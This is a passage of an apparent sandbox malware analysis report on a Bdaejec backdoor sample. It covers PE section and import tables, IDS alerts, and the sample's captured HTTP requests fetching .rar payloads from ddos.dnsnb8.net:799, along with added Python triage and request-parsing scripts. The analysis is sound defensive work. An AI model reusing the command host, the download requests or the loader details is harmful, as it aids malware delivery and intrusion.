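        % (patch["bytes"], "; ".join(patch["insns"]), patch["rel32"]),
    ]
    lines += ["PEB walk      : %-24s %s" % step for step in PEB_WALK]
    return lines


if __name__ == "__main__":
    print("\n".join(explain()))
```

The self-patch explains why the entrypoint section |Zu8 is mapped writable and executable: the stub rewrites bytes inside its own section at run time. The hard-coded `vSQshX.exe` ties the loader to the second process in the process list below.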
                                  Programming Language:
                                  • [ C ] VS2013 build 21005
                                  • [IMP] VS2008 SP1 build 30729
                                  • [EXP] VS2013 build 21005
                                  • [RES] VS2013 build 21005
                                  • [LNK] VS2013 build 21005
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x104e0 | 0x55 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10538 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x1e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x15000 | 0xac4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x1fc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x82e8 | 0x8400 | False | 0.45945785984848486 | data | 6.385498417639289 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xa000 | 0x70a6 | 0x7200 | False | 0.4922560307017544 | data | 6.246504412470083 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x12000 | 0xa80 | 0xc00 | False | 0.3167317708333333 | data | 3.550048547864024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0x13000 | 0x4 | 0x200 | False | 0.033203125 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x14000 | 0x1e0 | 0x200 | False | 0.53125 | data | 4.908362811923507 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x15000 | 0xac4 | 0xc00 | False | 0.7809244791666666 | data | 6.529309093769141 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
|Zu8 | 0x16000 | 0x5000 | 0x4200 | False | 0.7772253787878788 | data | 6.934749160260163 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_0 | 0x1b000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_1 | 0x20000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_2 | 0x25000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_3 | 0x2a000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_4 | 0x2f000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_5 | 0x34000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_6 | 0x39000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_7 | 0x3e000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_8 | 0x43000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_9 | 0x48000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_10 | 0x4d000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_11 | 0x52000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_12 | 0x57000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_13 | 0x5c000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_14 | 0x61000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_15 | 0x66000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_16 | 0x6b000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_17 | 0x70000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_18 | 0x75000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_19 | 0x7a000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_20 | 0x7f000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_21 | 0x84000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_22 | 0x89000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_23 | 0x8e000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_24 | 0x93000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_25 | 0x98000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_26 | 0x9d000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_27 | 0xa2000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_28 | 0xa7000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_29 | 0xac000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_30 | 0xb1000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_31 | 0xb6000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_32 | 0xbb000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_33 | 0xc0000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_34 | 0xc5000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_35 | 0xca000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_36 | 0xcf000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_37 | 0xd4000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_38 | 0xd9000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_39 | 0xde000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_40 | 0xe3000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_41 | 0xe8000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_42 | 0xed000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_43 | 0xf2000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_44 | 0xf7000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_45 | 0xfc000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_46 | 0x101000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_47 | 0x106000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_48 | 0x10b000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.dat_49 | 0x110000 | 0x424a | 0x4400 | False | 0.36379825367647056 | ISO-8859 text, with very long lines | 5.347406849062973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
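The section table above carries the three header-level indicators a reverser checks before running anything: where the entry point lives, which sections are both writable and executable, and how much of the file is made of identical blocks. The following Python script is an added example (not Joe Sandbox output) that transcribes the table values from this report into a list and applies those checks; the 50 `.dat_N` entries are generated from the 0x5000 stride the table shows rather than typed out. The set of "standard" section names is the author's own heuristic list.

```python
# Section table transcribed from the report above (added example, not Joe Sandbox
# output). Flags are the IMAGE_SCN_* names with the prefix dropped.
CODE, IDATA = "CNT_CODE", "CNT_INITIALIZED_DATA"
EXEC, READ, WRITE, DISCARD = "MEM_EXECUTE", "MEM_READ", "MEM_WRITE", "MEM_DISCARDABLE"

# (name, virtual address, virtual size, raw size, entropy, flags)
SECTIONS = [
    (".text",  0x01000, 0x82e8, 0x8400, 6.385498417639289,   {CODE, EXEC, READ}),
    (".rdata", 0x0a000, 0x70a6, 0x7200, 6.246504412470083,   {IDATA, READ}),
    (".data",  0x12000, 0x0a80, 0x0c00, 3.550048547864024,   {IDATA, READ, WRITE}),
    (".CRT",   0x13000, 0x0004, 0x0200, 0.08153941234324169, {IDATA, READ}),
    (".rsrc",  0x14000, 0x01e0, 0x0200, 4.908362811923507,   {IDATA, READ}),
    (".reloc", 0x15000, 0x0ac4, 0x0c00, 6.529309093769141,   {IDATA, DISCARD, READ}),
    ("|Zu8",   0x16000, 0x5000, 0x4200, 6.934749160260163,   {CODE, EXEC, READ, WRITE}),
] + [
    # .dat_0 .. .dat_49: identical sizes and entropy, virtual addresses 0x5000 apart.
    (".dat_%d" % i, 0x1b000 + 0x5000 * i, 0x424a, 0x4400, 5.347406849062973, {IDATA, READ, WRITE})
    for i in range(50)
]
IMAGE_BASE, ENTRY_POINT, FILE_SIZE = 0x10000000, 0x10016000, 960512

# Names a linker normally emits (heuristic list); anything else deserves a look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                  ".rsrc", ".reloc", ".tls", ".bss", ".CRT"}


def triage(sections, image_base, entry_point, file_size):
    """Header-level indicators: entry section, RWX sections, odd names, duplicated blocks."""
    ep_rva = entry_point - image_base
    report = {"entry_rva": ep_rva, "entry_section": None, "wx": [], "nonstandard": [], "duplicates": []}
    for name, va, vsize, rsize, _entropy, flags in sections:
        if va <= ep_rva < va + max(vsize, rsize):
            report["entry_section"] = name
        if EXEC in flags and WRITE in flags:      # RWX: self-modifying code or in-place unpacking
            report["wx"].append(name)
        if name not in STANDARD_NAMES:
            report["nonstandard"].append(name)
    # Sections with identical size and entropy almost always hold the same bytes;
    # many of them in a row is padding that inflates the file and shifts its hashes.
    groups = {}
    for name, _va, vsize, rsize, entropy, _flags in sections:
        groups.setdefault((vsize, rsize, entropy), []).append(name)
    for (_vsize, rsize, _entropy), names in groups.items():
        if len(names) > 1:
            total = len(names) * rsize
            report["duplicates"].append({"count": len(names), "first": names[0], "last": names[-1],
                                         "bytes": total, "share": total / file_size})
    return report


def main():
    r = triage(SECTIONS, IMAGE_BASE, ENTRY_POINT, FILE_SIZE)
    print("entry point RVA 0x%x lies in section %r" % (r["entry_rva"], r["entry_section"]))
    print("writable+executable sections:", ", ".join(r["wx"]) or "none")
    print("non-standard section names  :", len(r["nonstandard"]))
    for d in r["duplicates"]:
        print("%d sections %s..%s share size/entropy: %d bytes, %.0f%% of the file"
              % (d["count"], d["first"], d["last"], d["bytes"], 100 * d["share"]))


if __name__ == "__main__":
    main()
```

On this sample the entry point at RVA 0x16000 falls in the writable, executable, oddly named |Zu8 section rather than .text, and the fifty .dat_N sections account for about 91% of the 960512-byte file; the real code and data fit in the first seven sections.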
Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x14060 | 0x17d | XML 1.0 document text | English | United States
DLL | Import
KERNEL32.dll | SetFilePointer, GetFileAttributesW, ReadFile, GetLastError, MoveFileW, lstrcpyW, SetFileAttributesW, CreateMutexW, GetDriveTypeW, VerSetConditionMask, WaitForSingleObject, GetTickCount, InitializeCriticalSection, OpenProcess, GetSystemDirectoryW, TerminateThread, Sleep, TerminateProcess, VerifyVersionInfoW, WaitForMultipleObjects, DeleteCriticalSection, ExpandEnvironmentStringsW, lstrlenW, SetHandleInformation, lstrcatA, MultiByteToWideChar, CreatePipe, lstrcmpiA, Process32NextW, CreateToolhelp32Snapshot, LeaveCriticalSection, EnterCriticalSection, FindFirstFileW, lstrcmpW, FindClose, FindNextFileW, GetNativeSystemInfo, GetComputerNameW, GetDiskFreeSpaceW, GetWindowsDirectoryW, GetVolumeInformationW, LoadLibraryA, lstrcmpiW, VirtualFree, CreateThread, CloseHandle, lstrcatW, CreateFileMappingW, ExitThread, CreateFileW, GetModuleFileNameW, WriteFile, GetModuleHandleW, UnmapViewOfFile, MapViewOfFile, GetFileSize, GetEnvironmentVariableW, lstrcpyA, GetModuleHandleA, VirtualAlloc, GetProcAddress, Process32FirstW, GetTempPathW, GetProcessHeap, HeapFree, HeapAlloc, lstrlenA, CreateProcessW, ExitProcess, IsProcessorFeaturePresent
USER32.dll | BeginPaint, wsprintfW, TranslateMessage, LoadCursorW, LoadIconW, MessageBoxA, GetMessageW, EndPaint, DestroyWindow, RegisterClassExW, ShowWindow, CreateWindowExW, SendMessageW, DispatchMessageW, DefWindowProcW, UpdateWindow, GetForegroundWindow, SetWindowLongW
GDI32.dll | TextOutW
ADVAPI32.dll | FreeSid, RegSetValueExW, RegCreateKeyExW, RegCloseKey, CryptExportKey, CryptAcquireContextW, CryptGetKeyParam, CryptReleaseContext, CryptImportKey, CryptEncrypt, CryptGenKey, CryptDestroyKey, GetUserNameW, RegQueryValueExW, RegOpenKeyExW, AllocateAndInitializeSid
SHELL32.dll | ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW
CRYPT32.dll | CryptStringToBinaryA, CryptBinaryToStringA
WININET.dll | InternetCloseHandle, HttpAddRequestHeadersW, HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetOpenW, InternetReadFile
PSAPI.DLL | EnumDeviceDrivers, GetDeviceDriverBaseNameW
Name | Ordinal | Address
_ReflectiveLoader@0 | 1 | 0x10005ec0
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/31/22-23:41:31.686542 | TCP | 2807908 | ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin | 49708 | 799 | 192.168.2.4 | 63.251.106.25
08/31/22-23:41:23.030290 | TCP | 2807908 | ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin | 49707 | 799 | 192.168.2.4 | 63.251.106.25
08/31/22-23:41:22.706087 | UDP | 2838522 | ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 58565 | 53 | 192.168.2.4 | 8.8.8.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2022 23:41:22.853266954 CEST | 49707 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:23.017021894 CEST | 799 | 49707 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:23.017160892 CEST | 49707 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:23.030289888 CEST | 49707 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:23.180901051 CEST | 799 | 49707 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:23.180948019 CEST | 799 | 49707 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:23.181101084 CEST | 49707 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:23.214015007 CEST | 49707 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:23.344805002 CEST | 799 | 49707 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:23.378072023 CEST | 799 | 49707 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:31.519309044 CEST | 49708 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:31.682940006 CEST | 799 | 49708 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:31.683074951 CEST | 49708 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:31.686542034 CEST | 49708 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:31.846843958 CEST | 799 | 49708 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:31.846868038 CEST | 799 | 49708 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:31.846941948 CEST | 49708 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:31.846983910 CEST | 49708 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:31.853856087 CEST | 49708 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:32.010499001 CEST | 799 | 49708 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:32.017546892 CEST | 799 | 49708 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:44.749342918 CEST | 49715 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:44.913203001 CEST | 799 | 49715 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:44.913346052 CEST | 49715 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:45.077069044 CEST | 799 | 49715 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:45.077101946 CEST | 799 | 49715 | 63.251.106.25 | 192.168.2.4
Aug 31, 2022 23:41:45.077209949 CEST | 49715 | 799 | 192.168.2.4 | 63.251.106.25
Aug 31, 2022 23:41:45.606724977 CEST | 49715 | 799 | 192.168.2.4 | 63.251.106.25
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 31, 2022 23:41:22.706087112 CEST | 58565 | 53 | 192.168.2.4 | 8.8.8.8
Aug 31, 2022 23:41:22.814496994 CEST | 53 | 58565 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 31, 2022 23:41:22.706087112 CEST | 192.168.2.4 | 8.8.8.8 | 0xe22b | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 31, 2022 23:41:22.814496994 CEST | 8.8.8.8 | 192.168.2.4 | 0xe22b | No error (0) | ddos.dnsnb8.net |  | 63.251.106.25 | A (IP address) | IN (0x0001)
                                  • ddos.dnsnb8.net:799
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49707 | 63.251.106.25 | 799 | C:\Users\user\AppData\Local\Temp\vSQshX.exe
Timestamp | kBytes transferred | Direction | Data
Aug 31, 2022 23:41:23.030289888 CEST | 613 | OUT | GET /cj//k1.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49708 | 63.251.106.25 | 799 | C:\Users\user\AppData\Local\Temp\vSQshX.exe
Timestamp | kBytes transferred | Direction | Data
Aug 31, 2022 23:41:31.686542034 CEST | 613 | OUT | GET /cj//k2.rar HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                  Host: ddos.dnsnb8.net:799
                                  Connection: Keep-Alive


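The two HTTP requests captured above are cleartext HTTP to ddos.dnsnb8.net on port 799 fetching `.rar` files under a path with a doubled slash, which is what the report's "Uses known network protocols on non-standard ports" signature refers to. The following Python script is an added example (not Joe Sandbox output, and not the ETPRO Snort rule that fired) that parses raw request text and applies the generic checks a proxy-log or IDS analyst would start with. The request strings are transcribed from the sessions above; the extension list and the port allow-list are the author's own choices. The port check alone will also fire on legitimate internal services, so treat it as an enrichment rather than a verdict.

```python
import posixpath

# The two requests captured in the report above, transcribed verbatim (added example,
# not Joe Sandbox output). CRLF line endings as on the wire.
CAPTURED_REQUESTS = [
    "GET /cj//k1.rar HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: ddos.dnsnb8.net:799\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n",
    "GET /cj//k2.rar HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\r\n"
    "Host: ddos.dnsnb8.net:799\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n",
]

# Author's heuristic lists: ports where cleartext HTTP is expected, and payload-like extensions.
EXPECTED_HTTP_PORTS = {80, 443, 8080}
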